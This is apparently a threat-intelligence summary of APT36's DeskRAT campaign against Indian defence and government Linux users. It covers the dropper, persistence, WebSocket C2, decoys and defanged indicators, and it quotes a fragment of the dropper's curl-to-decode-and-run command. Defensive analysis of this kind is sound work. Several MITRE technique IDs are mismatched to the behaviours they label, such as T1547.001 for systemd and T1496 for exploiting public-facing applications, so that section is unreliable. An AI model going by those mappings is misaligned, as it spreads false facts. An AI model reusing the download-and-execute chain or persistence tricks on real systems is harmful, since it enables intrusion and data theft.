TransparentTribe targets Indian military organisations with DeskRAT

TransparentTribe (APT36) conducted a phishing campaign in mid-2025 targeting Linux systems used by Indian government entities, delivering a Golang-based RAT dubbed DeskRAT via malicious .desktop files inside ZIP archives hosted on staging servers. The malware establishes WebSocket C2 communications, supports file collection and remote execution, and uses persistence methods tailored to Linux (systemd service, cron, autostart .desktop, and .bashrc), with decoy PDFs referencing Indian defense events. #DeskRAT #TransparentTribe

Keypoints

Phishing emails delivered ZIP archives (previously via Google Drive, later hosted on dedicated staging servers) containing a malicious DESKTOP file that executes a Bash one-liner to fetch and run a payload.
The DESKTOP dropper downloads a hex-then-base64 encoded payload (Gimpfile.txt), decodes it, writes it to /tmp/, makes it executable, runs it, and opens a decoy PDF in Firefox to hide malicious activity.
The final payload, DeskRAT, is a Golang RAT that communicates over insecure WebSocket to multiple C2 endpoints and sends an initial JSON “heartbeat” with host fingerprinting and some hardcoded/fake fields.
DeskRAT implements multiple Linux-specific persistence mechanisms: systemd unit creation, cron job addition, autostart .desktop creation, and .bashrc-startup script installation.
C2 infrastructure includes web-admin interfaces (/login, /dashboard) and static JS/CSS supporting real-time client management, file browsing, upload/execute, and remote interactive sessions.
Decoy PDFs reference contemporary Indian events (Ladakh protests, RMC Mumbai posting) to increase targeting credibility and lure victims in defense and government organizations.
Analysis indicates use of LLM-assisted development patterns in DeskRAT (uniform, descriptive function names and redundant/evasive code), and ongoing campaign evolution with new domains and payload variants.

MITRE Techniques

[T1193 ] Spearphishing Attachment – Malicious ZIP attachments in phishing emails delivered a DESKTOP file that executes a Bash one-liner to fetch and run further payloads. Quote: ‘phishing emails containing a ZIP archive as an attachment.’
[T1204.002 ] User Execution: Malicious File – The DESKTOP file is presented with a PDF icon and autostart attributes to encourage execution; the file runs a bash -c command to download and execute payloads. Quote: ‘Exec=bash -c … curl … | xxd -r -p | base64 -d)’;
[T1105 ] Ingress Tool Transfer – The dropper downloads Gimpfile.txt from staging servers (and earlier via Google Drive), decodes hex and base64, and writes the final binary to /tmp. Quote: ‘Downloads the file Gimpfile.txt from a remote staging server … Converting hexadecimal to binary with xxd -r -p … Decoding the resulting data from Base64’
[T1547.001 ] Boot or Logon Autostart Execution: Systemd Service – DeskRAT installs persistence by creating a systemd service unit to run the sample at startup. Quote: ‘CreateSystemdServiceUnit will create a service using a basic unit template’
[T1543.003 ] Create or Modify System Process: Cron – The malware adds a cron job to start the sample every minute as a persistence mechanism. Quote: ‘AddToCrontabScheduler will add a cron job starting the sample every minutes’
[T1547.001 ] Boot or Logon Autostart Execution: Autostart (.desktop) – DeskRAT creates $HOME/.config/autostart/system-backup.desktop to achieve persistence in desktop environments. Quote: ‘CreateAutostartDesktopFile will create $HOME/.config/autostart/system-backup.desktop’
[T1543.001 ] Create or Modify System Process: Bash Startup Script – The malware writes a startup script and adds execution in .bashrc to ensure execution on shell login. Quote: ‘CreateBashStartupScript writes … and adds a line in .bashrc that checks if the bash script exists, and then executes it.’
[T1071.001 ] Application Layer Protocol: Web Protocols – DeskRAT uses WebSocket (ws://…:8080/ws) for C2 communications and exchanges JSON messages for commands and telemetry. Quote: ‘establishes a WebSocket connection to the /ws endpoint on port 8080’
[T1106 ] Native API – Remote Execution – DeskRAT supports commands to upload and execute files of various types, invoking interpreters or executables (python, sh, xdg-open). Quote: ‘For .py : exec.Command(“python”, filePath) … For .desktop : exec.Command(“xdg-open”, filePath)’
[T1005 ] Data from Local System – File Collection – The ‘start_collection’ command searches for and exfiltrates files matching many document and archive extensions under 100MB via the WebSocket. Quote: ‘Search for file with extension: bmp, doc, … pdf, png … Every file under 100MB that matches, will be sent over the websocket.’
[T1496 ] Exploit Public-Facing Application – Staging/C2 Infrastructure – Use of dedicated staging servers hosting ZIPs and C2 web interfaces (/login, /dashboard) to deliver and control malware. Quote: ‘staging server which hosts the ZIP files’ and ‘C2 servers … serve an authentication page at the /login endpoint’

Indicators of Compromise

[File hash ] DeskRAT sample – MD5 3563518ef8389c7c7ac2a80984a2c4cd (final payload)
[File hash ] Malicious ZIP – MD5 4c56fedd177108a8849cec423f020625 (MoM_regarding_Defence_Sectors_by_Secy_Defence_25_Sep_2025.zip)
[Domain ] Staging/C2 hosts – modgovindia[.]com (used to host Gimpfile.txt and decoy PDFs), seeconnectionalive[.]website (C2), and newforsomething[.]rest (C2)
[IP address ] C2 server – 147.93.155[.]118:8080 (WebSocket C2 endpoint ws://147.93.155[.]118:8080/ws)
[Filename ] Dropper and decoys – MoM_regarding_Defence_Sectors_by_Secy_Defence_25_Sep_2025.desktop (DESKTOP dropper), CDS_Directive_Armed_Forces.pdf and POsting of Offrs to RMC Mumbai.pdf (decoy documents)
[URL paths ] C2 endpoints and assets – /ws (WebSocket endpoint), /login (C2 auth page), /static/js and /static/css (dashboard/js assets)

SHARE THIS STORY

WhatsApp X (Twitter)Telegram Bluesky Facebook LinkedIn Threads Email Print